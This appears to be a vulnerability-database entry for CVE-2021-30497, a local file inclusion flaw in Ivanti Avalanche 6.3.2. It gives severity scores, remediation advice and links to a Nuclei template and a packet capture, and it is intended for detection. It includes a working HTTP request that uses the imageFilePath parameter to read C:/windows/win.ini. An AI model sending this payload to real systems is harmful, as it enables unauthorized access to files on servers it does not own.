🔙 목록으로 돌아가기

CVE-2021-30497: Ivanti Avalanche 6.3.2 - Local File Inclusion

TitleIvanti Avalanche 6.3.2 - Local File Inclusion
Authorgy741
SeverityHigh
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the affected system.
RemediationApply the latest security patches or updates provided by Ivanti to fix the LFI vulnerability in Avalanche 6.3.2.
CVSS Score7.5
EPSS Score0.93774
CVE IDCVE-2021-30497
CWE IDCWE-22
Tags cve2021 cve avalanche traversal lfi ivanti windows vkev vuln

🔍 Vulnerability Description

Ivanti Avalanche 6.3.2 is vulnerable to local file inclusion because it allows remote unauthenticated user to access files that reside outside the ‘image’ folder.

🌐 HTTP Request

GET /AvalancheWeb/image?imageFilePath=C:/windows/win.ini HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-30497.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-30497.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A